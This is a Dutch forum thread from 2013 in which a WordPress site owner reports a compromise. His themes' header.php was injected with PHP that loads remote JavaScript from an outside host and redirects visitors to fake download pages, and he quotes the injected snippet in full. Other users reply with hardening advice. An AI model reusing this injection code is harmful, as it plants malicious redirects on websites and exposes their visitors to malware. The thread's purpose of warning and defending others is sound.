Waarschuwing WP 3.6 - Softwareontwikkeling

dinsdag 3 september 2013 12:49

Acties:

Topicstarter

Ik bezocht vanochtend mijn eigen website en kwam er achter dat ik een of andere VIO Player moest downloaden via een popup. Vertrouwde dit niet, reinste bullshit natuurlijk.
Na wat onderzoek kwam ik uit dat die popup van de volgende plek kwam:
http://verification.mvpitsolutions.com/lander/Password%20Page_files/gwframe.html
Na wat verder onderzoek blijkt het dat deze 'lander' zich in mijn Themes heeft genesteld. Hoe weet ik niet. Of het aan mijn gebrekkige veiligheid ligt, durf ik niet te zeggen en of het aan WP 3.6 ligt weet ik ook niet.
in ieder geval is het vrij nieuw, want alle info die ik er over vind op Google is van 2-3 dagen terug.
Mocht je er last van hebben: Controleer je 'header.php' van elk theme dat je gebruikt. (Via FTP) op de volgende link: verification.mvpitsolutions.com/.

Ik weet niet of dit al bekend is, maar ik dacht ik deel het gelijk met iedereen, voordat het misschien wel iets kwalijks is

Bij mij staat er dit:

code:

if(empty($eka)) {
$eka = "<script type=\"text/javascript\">var gwloaded = false;</script>
    <script src=\"http://verification.mvpitsolutions.com/lander/Password%20Page_files/gwjs.js\" type=\"text/javascript\"></script>
    <script type=\"text/javascript\">if (gwloaded==false){window.location = \"http://verification.mvpitsolutions.com/lander/AdBlock%20Must%20be%20Disabled%20to%20View%20This%20Content.html\";}</script>
<noscript><meta http-equiv=\"refresh\" content=\"0;url=http://verification.mvpitsolutions.com/lander/JavaScript%20Required.html\" /></noscript>";
echo $eka;

[ Voor 25% gewijzigd door MueR op 03-09-2013 13:22 . Reden: Linkje even weggepoetst ]

Elektronicaprojecten van mij: http://www.gm7.nl

dinsdag 3 september 2013 13:04

Acties:

TheNephilim

Wtfuzzle

Dit kan op allerlei manieren zijn aangebracht; via FTP of gewoon simpel op Wordpress inloggen. Heeft (zeer waarschijnlijk) niks met Wordpress 3.6 te maken.

Ik zou wel even Wordpress opnieuw installeren (tenminste de bestanden vervangen). Dat geld ook voor je thema's en plugins. Eigen geschreven software goed nakijken, wachtwoorden vervangen door sterkere varianten en dan ben je er eigenlijk wel.

dinsdag 3 september 2013 13:51

Acties:

alexandersamson

Topicstarter

De wachtwoorden zullen het probleem wel niet wezen, dan moeten ze wel erg veel geluk hebben, wat wel opvalt is dat er pas sinds een dag of 2-3 iets over te vinden valt.
Aan mijn kant waren er een paar mappen (door eigen stommiteit ga ik van uit) als 777 gechmod. Die heb ik naar 755 gezet, hopelijk maakt dat het iets veiliger.
Nu ben ik zowizo niet heel sterk in die z.g.n. chmod en zie ik de grens tussen 'onbruikbaar om mee te werken' en 'onveilig' er bij nooit echt.

Elektronicaprojecten van mij: http://www.gm7.nl

dinsdag 3 september 2013 14:07

Acties:

TheNephilim

Wtfuzzle

Better safe then sorry

Als je met CHMOD aan de slag moet voor je directories, dan gaan er (naar mijn ervaring) sowieso dingen mis. Ik weet niet of je zelf host, maar de hoster waar wij onze klanten heen sturen, heeft dat rechten gebeuren zo goed voor elkaar, dat je nooit met CHMOD aan de slag hoeft. Bij die hoster hebben we nog nooit last gehad van gehackte websites. De hosters waar de klant al bij zit of zelf gekozen heeft, hebben vaker problemen. Ook is het daar regelmatig mis met rechten en dergelijke.

dinsdag 3 september 2013 14:12

Acties:

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

alexandersamson schreef op dinsdag 03 september 2013 @ 13:51:
De wachtwoorden zullen het probleem wel niet wezen, dan moeten ze wel erg veel geluk hebben

Assumptions are the mother of all f*ckups

Om maar eens een zijstraat te noemen: gebruik je FileZilla?

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

dinsdag 3 september 2013 14:26

Acties:

alexandersamson

Topicstarter

Niet meer. Nu forklift via MacOS iets van een half jaar ongeveer.

[ Voor 34% gewijzigd door alexandersamson op 03-09-2013 14:30 ]

Elektronicaprojecten van mij: http://www.gm7.nl

dinsdag 3 september 2013 14:34

Acties:

Rafe

RobIII schreef op dinsdag 03 september 2013 @ 14:12:
[...]

Assumptions are the mother of all f*ckups Om maar eens een zijstraat te noemen: gebruik je FileZilla?

Of opslag van wachtwoorden in je browser.

Ik heb met een WordPress-installatie eens iets soortgelijks meegemaakt, mijn neef had op zijn pc een virus gehad en een paar dagen later had ons blog midden in de nacht op verschillende plekken code geinjecteerd gekregen via FTP. Gelukkig was het vrij eenvoudig terug te vinden op welke plekken adv timestamps en dat alle toegevoegde code vooraf werd gegaan aan een identifier...

dinsdag 3 september 2013 23:17

Acties:

Niet Henk

WordPress is op een aantal plekken fundamenteel onveilig. Dingen die ik, als ik jouw was, i.i.g. zou checken:
Hebben alle users op je site sterke wachtwoorden? (er zijn erg veel brute force en dictionary aanvallen op WordPress gedaan, dus zelfs sterke maar onorginele wachtwoorden tellen).
Gebruik je cookies voor het inloggen? Zoja, vervang dan de salts in het wp-config.php bestand!
Gebruik je XML-RPC? (nodig voor o.a. Windows Live Writer, WordPress app). Zoja, zet het liever uit.
En ja, chmod 777 is in principe onveilig, maar dit is zelden het probleem. Vaak houd je host wel access logs bij, en blijven mensen braaf van andermans bestanden af.

Als je op onbeveiligde netwerken gebruik van FTP, XML-RPC of een andere onbeveiligde login hebt gemaakt, zou dat het probleem kunnen zijn. Daarna is denk ik het meest waarschijnlijk dat er toch spyware op een van je computers staat, die o.a. via cookies kan werken. En daarna komen gewoon de zwakke wachtwoorden.

Wil je dit in de toekomst voorkomen, check dan de Better-wp-security plugin. Hiermee kan je veel dingen checken en fixen.

woensdag 4 september 2013 10:13

Acties:

TheNephilim

Wtfuzzle

Niet Henk schreef op dinsdag 03 september 2013 @ 23:17:
WordPress is op een aantal plekken fundamenteel onveilig.

Nou, nou dat valt ook wel weer mee. De wachtwoorden kwestie die je noemt, dat ligt bij je gebruikers en niet bij Wordpress. Er zijn op dit moment (volgens mij) geen veiligheidsproblemen bekend bij Wordpress.

woensdag 4 september 2013 15:42

Acties:

Niet Henk

TheNephilim schreef op woensdag 04 september 2013 @ 10:13:
[...]

Nou, nou dat valt ook wel weer mee. De wachtwoorden kwestie die je noemt, dat ligt bij je gebruikers en niet bij Wordpress. Er zijn op dit moment (volgens mij) geen veiligheidsproblemen bekend bij Wordpress.

Nee, maar er worden continue brute-force aanvallen gedaan op vrijwel alle WordPress sites. Sinds ze standaard duidelijk maken dat ze WordPress sites zijn, en de login plek vaak niet veranderd is, kan je makkelijk automatisch aanvallen doen. En het aantal brute-force aanvallen op WordPress ligt heel erg hoog.
Ook staat standaard XML-RPC aan, waar je ook brute-force aanvallen op kan doen.

Om het fundamenteel onveilig te noemen, gaat misschien wat ver, maar als je een WordPress site hebt, moet je in ieder geval erg goed op de veiligheid van wachtwoorden letten.